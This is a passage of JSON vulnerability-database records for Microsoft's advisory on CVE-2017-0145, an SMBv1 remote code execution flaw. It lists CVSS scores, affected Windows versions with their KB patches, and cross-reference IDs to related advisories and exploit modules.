"KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KB4014077", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4014077", "KB4012212", "KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", 